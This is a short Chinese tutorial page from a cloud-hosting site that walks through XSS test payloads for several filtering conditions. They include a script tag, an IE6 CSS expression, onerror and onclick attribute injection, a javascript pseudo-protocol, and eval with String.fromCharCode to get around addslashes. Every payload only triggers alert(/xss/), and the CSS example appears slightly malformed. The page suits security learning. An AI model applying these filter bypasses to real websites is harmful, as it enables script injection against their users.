温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

xss的小测试是怎样进行的

发布时间:2022-01-10 10:19:39 来源:亿速云 阅读:100 作者:柒染 栏目:安全技术

小编今天带大家了解xss的小测试是怎样进行的,文中知识点介绍的非常详细。觉得有帮助的朋友可以跟着小编一起浏览文章的内容,希望能够帮助更多想解决这个问题的朋友找到问题的答案,下面跟着小编一起深入学习“xss的小测试是怎样进行的”的知识吧。

  • 无安全方面的限制,直接使用

<script>alert(/xss/);</script>

  • 限制条件:只能使用CSS,不允许使用html标签

我们知道利用expression可以用来构造XSS,但是只能在IE下面测试,所以下面的测试请在IE6中执行。

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}
  • 限制条件:对HTML进行了转义,Image标签可用

测试输入的字符会被插入到src地址中,那么可以使用伪协议来绕过。

直接输入

alert( /xss/);

或者你也可以使用事件来绕过,注意闭合语句即可,如下:

1" onerror=alert(/xss/); var a="1

  • 限制条件:使用了关键字过滤。

我测试了一下,大部分都过滤了,有部分未过滤,经测试script/onerror过滤了,但是onclick未过滤,使用onclick事件绕过

<img src=# onclick=alert(/xss/);>
  • 限制条件:使用addslashes对特征字符进行了转义

也就是说我们的XSS语句中不能出现单引号,双引号等等特征字符。

直接使用

<script>alert(/xss/);</script>

即可绕过

或者使用String.fromCharCode方法,如下:

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

感谢大家的阅读,以上就是“xss的小测试是怎样进行的”的全部内容了,学会的朋友赶紧操作起来吧。相信亿速云小编一定会给大家带来更优质的文章。谢谢大家对亿速云网站的支持!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

xss
AI